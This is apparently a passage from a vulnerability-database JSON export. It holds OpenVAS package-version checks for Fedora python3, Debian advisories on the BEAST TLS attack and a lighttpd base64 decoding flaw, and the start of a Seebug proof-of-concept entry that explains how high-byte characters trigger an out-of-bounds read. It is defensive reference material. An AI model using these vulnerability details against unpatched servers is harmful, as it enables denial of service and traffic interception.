"vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2012-5785", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864317", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864317", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2012-5785\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080066.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864317\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:02:10 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-5785\");\n script_name(\"Fedora Update for python3 FEDORA-2012-5785\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python3'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.2.3~5.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-06-22T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2012-9135", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864477", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864477", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2012-9135\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082457.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864477\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-22 10:24:46 +0530 (Fri, 22 Jun 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9135\");\n script_name(\"Fedora Update for python3 FEDORA-2012-9135\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python3'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.2.3~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-03T10:56:40", "description": "Check for the Version of python3", "cvss3": {}, "published": "2012-06-22T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2012-9135", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:864477", "href": "http://plugins.openvas.org/nasl.php?oid=864477", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2012-9135\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"python3 on Fedora 16\";\ntag_insight = \"Python 3 is a new version of the language that is incompatible with the 2.x\n line of releases. The language is mostly the same, but many details, especially\n how built-in objects like dictionaries and strings work, have changed\n considerably, and a lot of deprecated features have finally been removed.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082457.html\");\n script_id(864477);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-22 10:24:46 +0530 (Fri, 22 Jun 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-9135\");\n script_name(\"Fedora Update for python3 FEDORA-2012-9135\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of python3\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.2.3~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-11T11:05:59", "description": "Check for the Version of python-docs", "cvss3": {}, "published": "2012-05-08T00:00:00", "type": "openvas", "title": "Fedora Update for python-docs FEDORA-2012-5924", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2018-01-09T00:00:00", "id": "OPENVAS:864223", "href": "http://plugins.openvas.org/nasl.php?oid=864223", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python-docs FEDORA-2012-5924\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The python-docs package contains documentation on the Python\n programming language and interpreter.\n\n Install the python-docs package if you'd like to use the documentation\n for the Python language.\";\n\ntag_affected = \"python-docs on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079979.html\");\n script_id(864223);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 12:35:11 +0530 (Tue, 08 May 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-5924\");\n script_name(\"Fedora Update for python-docs FEDORA-2012-5924\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of python-docs\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"python-docs\", rpm:\"python-docs~2.7.3~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-08T12:58:51", "description": "Check for the Version of python3", "cvss3": {}, "published": "2012-05-04T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2012-5916", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2018-01-08T00:00:00", "id": "OPENVAS:864199", "href": "http://plugins.openvas.org/nasl.php?oid=864199", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2012-5916\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"python3 on Fedora 15\";\ntag_insight = \"Python 3 is a new version of the language that is incompatible with the 2.x\n line of releases. The language is mostly the same, but many details, especially\n how built-in objects like dictionaries and strings work, have changed\n considerably, and a lot of deprecated features have finally been removed.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079698.html\");\n script_id(864199);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-04 10:45:29 +0530 (Fri, 04 May 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-5916\");\n script_name(\"Fedora Update for python3 FEDORA-2012-5916\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of python3\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.2.3~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2023-04-29T16:55:08", "description": "- ---------------------------------------------------------------------------\nDebian Security Advisory DSA-2368-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDec 20th, 2011 http://www.debian.org/security/faq\n- ---------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nDebian bug : 652726\nCVE IDs : CVE-2011-4362 CVE-2011-3389\n\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\n Xi Wang discovered that the base64 decoding routine which is used to\n decode user input during an HTTP authentication, suffers of a signedness\n issue when processing user input. As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n\nCVE-2011-3389\n\n When using CBC ciphers on an SSL enabled virtual host to communicate with\n certain client, a so called "BEAST" attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-12-21T00:02:46", "type": "debian", "title": "[SECURITY] [DSA 2381-] lighttpd security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "modified": "2011-12-21T00:02:46", "id": "DEBIAN:DSA-2381-:320B8", "href": "https://lists.debian.org/debian-security-announce/2011/msg00246.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-04-29T16:55:03", "description": "- ---------------------------------------------------------------------------\nDebian Security Advisory DSA-2368-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDec 20th, 2011 http://www.debian.org/security/faq\n- ---------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nDebian bug : 652726\nCVE IDs : CVE-2011-4362 CVE-2011-3389\n\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\n Xi Wang discovered that the base64 decoding routine which is used to\n decode user input during an HTTP authentication, suffers of a signedness\n issue when processing user input. As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n\nCVE-2011-3389\n\n When using CBC ciphers on an SSL enabled virtual host to communicate with\n certain client, a so called "BEAST" attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-12-21T00:24:51", "type": "debian", "title": "[SECURITY] [DSA 2368-1] lighttpd security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "modified": "2011-12-21T00:24:51", "id": "DEBIAN:DSA-2368-1:91542", "href": "https://lists.debian.org/debian-security-announce/2011/msg00247.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-02T16:50:39", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2398-2 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nMarch 31, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : curl\nVulnerability : regression\nDebian-specific: no\nDebian Bug : 658276\n\ncURL is a command-line tool and library for transferring data with URL\nsyntax. It was discovered that the countermeasures against the\nDai/Rogaway chosen-plaintext attack on SSL/TLS (CVE-2011-3389,\n"BEAST") cause interoperability issues with some server\nimplementations. This update ads the the CURLOPT_SSL_OPTIONS and\nCURLSSLOPT_ALLOW_BEAST options to the library, and the\n- --ssl-allow-beast option to the "curl" program.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 7.21.0-2.1+squeeze2.\n\nWe recommend that you upgrade your curl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2012-03-31T19:38:57", "type": "debian", "title": "[SECURITY] [DSA 2398-2] curl regression", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3389"], "modified": "2012-03-31T19:38:57", "id": "DEBIAN:DSA-2398-2:1A463", "href": "https://lists.debian.org/debian-security-announce/2012/msg00075.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-04-29T16:53:34", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2398-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 30, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : curl\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-3389 CVE-2012-0036 \n\nSeveral vulnerabilities have been discovered in Curl, an URL transfer \nlibrary. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2011-3389\n\n This update enables OpenSSL workarounds against the "BEAST" attack.\n Additional information can be found in the Curl advisory:\n http://curl.haxx.se/docs/adv_20120124B.html\n\nCVE-2012-0036\n\n Dan Fandrich discovered that Curl performs insufficient sanitising\n when extracting the file path part of an URL.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 7.18.2-8lenny6.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 7.21.0-2.1+squeeze1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.24.0-1.\n\nWe recommend that you upgrade your curl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2012-01-30T19:49:07", "type": "debian", "title": "[SECURITY] [DSA 2398-1] curl security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3389", "CVE-2012-0036"], "modified": "2012-01-30T19:49:07", "id": "DEBIAN:DSA-2398-1:A6208", "href": "https://lists.debian.org/debian-security-announce/2012/msg00022.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-23T18:32:51", "description": "Package : nss\nVersion : 3.12.8-1+squeeze11\nCVE ID : CVE-2011-3389 CVE-2014-1569\nDebian Bug : 773625\n\nnss 3.12.8-1+squeeze11 fixes two security issues:\n\nCVE-2011-3389\n\n SSL 3.0 and TLS 1.0 connections were vulnerable to some chosen\n plaintext attacks which allowed man-in-the middle attackers to obtain\n plaintext HTTP headers on an HTTPS session. This issue is known as\n the "BEAST" attack.\n\nCVE-2014-1569\n\n Possible information leak with too-permissive ASN.1 DER decoding of\n length.\n\n-- \nRapha\u00ebl Hertzog \u25c8 Debian Developer\n\nSupport Debian LTS: http://www.freexian.com/services/debian-lts.html\nLearn to master Debian: http://debian-handbook.info/get/\nAttachment:\nsignature.asc\nDescription: Digital signature\n", "cvss3": {}, "published": "2015-02-16T15:44:22", "type": "debian", "title": "[SECURITY] [DLA 154-1] nss security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3389", "CVE-2014-1569"], "modified": "2015-02-16T15:44:22", "id": "DEBIAN:DLA-154-1:C91BD", "href": "https://lists.debian.org/debian-lts-announce/2015/02/msg00008.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T17:55:59", "description": "No description provided by source.", "cvss3": {}, "published": "2012-01-02T00:00:00", "type": "seebug", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2012-01-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30003", "id": "SSV:30003", "sourceData": "\n 29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n \r\n \r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n--- CUT ---\r\n \r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n \r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n 